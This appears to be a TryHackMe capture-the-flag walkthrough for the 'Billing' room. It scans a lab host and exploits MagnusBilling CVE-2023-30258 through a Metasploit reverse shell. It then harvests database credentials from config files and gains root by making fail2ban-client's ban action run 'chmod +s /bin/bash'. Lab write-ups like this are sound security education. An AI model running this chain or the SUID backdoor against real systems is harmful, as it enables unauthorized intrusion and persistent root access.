# Billing {% embed url="" %} Hey, fellow hackers! ๐Ÿดโ€โ˜ ๏ธ Today, we're setting sail into the **Billing** room on TryHackMe, where our mission is to **navigate through vulnerabilities**, uncover flags and claim **root access!** ๐Ÿ’€โš”๏ธ ## Reconnaissance - Scouting the Enemy ๐Ÿš€ Every great conquest starts with **intelligence gathering**. A thorough **network scan** helps identify open services and potential entry points. I use **Nmap** for this task: ```bash r1pp3r ๐Ÿ”ฑ god2eye ~/Documents/tryhackme/billing ฮป nmap -sC -sV 10.10.137.233 | tee nmap.txt Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-17 12:52 IST Nmap scan report for 10.10.137.233 Host is up (0.35s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) | ssh-hostkey: | 3072 79:ba:5d:23:35:b2:f0:25:d7:53:5e:c5:b9:af:c0:cc (RSA) | 256 4e:c3:34:af:00:b7:35:bc:9f:f5:b0:d2:aa:35:ae:34 (ECDSA) |_ 256 26:aa:17:e0:c8:2a:c9:d9:98:17:e4:8f:87:73:78:4d (ED25519) 80/tcp open http Apache httpd 2.4.56 ((Debian)) | http-title: MagnusBilling |_Requested resource was http://10.10.137.233/mbilling/ |_http-server-header: Apache/2.4.56 (Debian) | http-robots.txt: 1 disallowed entry |_/mbilling/ 3306/tcp open mysql MariaDB (unauthorized) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 60.45 seconds ``` ๐Ÿ•ต๏ธ **Findings :** * **22/tcp** - OpenSSH 8.4p1 (Debian) * **80/tcp** - Apache 2.4.56 hosting a web application (`/mbilling/`) * **3306/tcp** - MariaDB service, access denied (likely hosting sensitive VoIP data) The presence of `/mbilling/` suggests the system is running **MagnusBilling**, a widely used VoIP billing platform. This discovery guides our next steps towards **web exploitation**. ## Initial Access - Breaking In! ๐Ÿดโ€โ˜ 

MagnusBilling Login

#### Exploiting MagnusBilling (CVE-2023-30258) A quick **OSINT search** reveals that `MagnusBilling` has an **Unauthenticated Remote Command Execution (RCE) vulnerability** [(CVE-2023-30258)](https://www.rapid7.com/db/modules/exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258/) . Leveraging this flaw provides us with an entry point into the system. Time to **fire up Metasploit** ๐Ÿ”ฅ ``` msfconsole search magnusbilling use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258 set RHOSTS set LHOST set LPORT 6969 exploit ``` ๐ŸŽฏ Boom! We're in! * Successfully executed RCE ๐ŸŽ‰, gaining a **meterpreter shell** ๐Ÿ’ป Letโ€™s stabilize our foothold and get comfy: ``` meterpreter > shell which python3 /usr/bin/python3 python3 -c "import pty;pty.spawn('/bin/bash')" asterisk@Billing:/var/www/html/mbilling/lib/icepay$ cd /home/magnus asterisk@Billing:/home/magnus$ cat user.txt cat user.txt [REDACTED] ``` With access as **magnus**, we begin **system enumeration** and credential discovery. Retrieving the user flag! Yo-ho-ho!, Letโ€™s press on. ๐Ÿดโ€โ˜ ๏ธ ## Privilege Escalation - Climbing the Ladder ๐Ÿ† **Hunting for Credentials and Misconfigurations** A deep dive into configuration files often yields useful information. Looking into key application settings, we find potential credentials: ``` cd /var/www/html/mbilling/protected/config cat main.php ``` Additionally, another configuration file linked to Asterisk contains database credentials: ``` cat /etc/asterisk/res_config_mysql.conf ``` Extracted credentialsโ€”๐Ÿ’ฐ Jackpot! ``` dbuser = mbillingUser dbpass = BLOGYwvtJkI7uaX5 ``` Sadly, no instant root access. I continued exploring for privilege escalation pathsโ€”our journey is **far from over!** ๐Ÿ”ฅ Checking **sudo privileges**: ```bash asterisk@Billing:/home$ sudo -l sudo -l Matching Defaults entries for asterisk on Billing: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin Runas and Command-specific defaults for asterisk: Defaults!/usr/bin/fail2ban-client !requiretty User asterisk may run the following commands on Billing: (ALL) NOPASSWD: /usr/bin/fail2ban-client ``` **Observation:** ๐ŸŽฏ **Bingo!** The **asterisk** user can execute `/usr/bin/fail2ban-client` as **root** **without a password**. By modifying **fail2banโ€™s SSH action**, we introduce a **SUID backdoor**: 
asterisk@Billing:/home$ sudo /usr/bin/fail2ban-client status
sudo /usr/bin/fail2ban-client status
Status
|- Number of jail:	8
`- Jail list:	ast-cli-attck, ast-hgc-200, asterisk-iptables, asterisk-manager, ip-blacklist, mbilling_ddos, mbilling_login, sshd
asterisk@Billing:/home$ sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban 'chmod +s /bin/bash'
<n iptables-multiport actionban 'chmod +s /bin/bash'
chmod +s /bin/bash
asterisk@Billing:/home$ sudo /usr/bin/fail2ban-client get sshd action iptables-multiport actionban
<client get sshd action iptables-multiport actionban
chmod +s /bin/bash
asterisk@Billing:/home$ sudo /usr/bin/fail2ban-client set sshd banip 1.2.3.4
sudo /usr/bin/fail2ban-client set sshd banip 1.2.3.4
1
Verifying changes: ```bash asterisk@Billing:/home$ ls -la /bin/bash ls -la /bin/bash -rwsr-sr-x 1 root root 1234376 Mar 27 2022 /bin/bash ``` Executing `/bin/bash -p` now elevates us to **root.** ๐Ÿš€ **Now, letโ€™s take the throne!** ```bash asterisk@Billing:/home$ /bin/bash -p /bin/bash -p bash-5.1# whoami whoami root bash-5.1# cat /root/root.txt cat /root/root.txt [REDACTED] ``` ## Conclusion ๐Ÿ This exercise highlights the **real-world attack chain** used to compromise a vulnerable system. **Final words?** Stay sharp, keep hacking, and always test your defenses! โš”๏ธ๐Ÿ”ฅ Happy hacking, fellow pirates! ๐Ÿดโ€โ˜ ๏ธ๐Ÿ’ป